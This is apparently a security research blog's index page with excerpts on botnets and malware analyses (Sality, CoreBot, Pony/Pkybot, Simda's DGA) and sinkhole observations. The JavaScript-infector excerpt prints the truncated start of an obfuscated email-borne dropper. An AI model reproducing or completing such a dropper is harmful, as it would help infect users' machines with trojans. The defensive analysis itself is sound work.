Upcoming Sality presentation at Botconf

Update: The presentation is available here and the paper here. The Virus Tracker team will join Botconf’15 conference in Paris, France! We will hold a presentation about Sality. Abstract: Sality is one of the longest-alive threats and probably the most underrated botnet ever. It made its first appearance in 2003 and is still active in […]

Zombie malware without command & control servers

As malware needs to communicate in some ways with its operators (for getting commands, updates and sending stolen data) they typically implement a form of communication to command & control servers. Those C&Cs are either hard-coded or generated (based on some type of seed) domain names or IPs. For generated domains they implement a domain […]

CoreBot: A closer look

A week ago our colleagues at IBM published a blog post about a new stealer named “CoreBot”. The post points out that CoreBot has a modular plugin system, is capable of stealing private information including certificates and has a DGA (domain generation algorithm) implemented. We got our hands to 4 different samples and analyzed them. […]

NetBIOS: Old & known but still posing a threat

There are few good articles about NetBIOS like Is it time to get rid of NetBIOS?, NetBIOS spoofing for attacks on browser and Pwning hotel guests and still it (NetBIOS over TCP/IP) poses a threat to modern systems. NetBIOS was developed in the 80s and is strictly seen just an API, though there is NetBIOS […]

Javascript infectors arriving via email spam

Recently we have been receiving multiple spam messages that had zip files attached with .js files inside. It tries to trick the user into opening the javascript files which would download and execute Trojans. This is the contents of 00242116.doc.js which was in the zip file: var stroke=”5556515E0D0A020B240F08010D17170A01164A0B1603″;function squ61() { return ‘gs’; }; function squ214() […]

Pony + Pkybot + Automated Transfer System = Banker

A couple of months ago we were analyzing a sample which was tagged as “Pkybot”. The analyzed sample was MD5 7609F372F9AFBAADA6AA330A829C90AF SHA1 F20CB7A64A4CFE4F7E41E2F983A8F34CDB5C153A, according to its compilation time stamp it was compiled on 10/17/2014 2:34 pm. Analysis turned out that it’s a Pony sample, there are 2 good analysis reports of Pony here and here. […]

Internet Attacks Against Nuclear Power Plants

We presented “Internet Attacks Against Nuclear Power Plants” at the IAEA International Conference on Computer Security in a Nuclear World in Vienna, Austria on June 3, 2015. You can read the paper here and the presentation slides here.

Sharing the Simda Pseudo DGA

There was the takedown of Simda reported yesterday by Microsoft. According to that report, Simda communicates “up to six hard-coded IPs” and has a DGA that it uses to set the hosts field in the HTTP header and also used as seed for encryption. This is the reversed algorithm, as reversed of sample MD5 892A0A4DC4C3EEA90BECE60C142AEAF1 […]

Web attacks caught by Virus Tracker

With having the largest botnet monitoring system in the world (with more than 8.000 domains) we see all kinds of bots connecting to our sinkholes – including robots that try to find and exploit certain vulnerabilities like shellshock, some admin panels or that try to find SQLIs. Finding exploit attempts in our dataset Finding such […]

Virus Tracker under 10 Gbps Ddos Attack

Virus Tracker is right now under a 10 Gbit ddos attack (UDP and TCP). Last November we have been already under 1 Gbit ddos. Again, evidence suggests that it is being orchestrated from the Sality botnet. As you can seen in the below graph, this time the criminals exhausted the maximum connection speed of the […]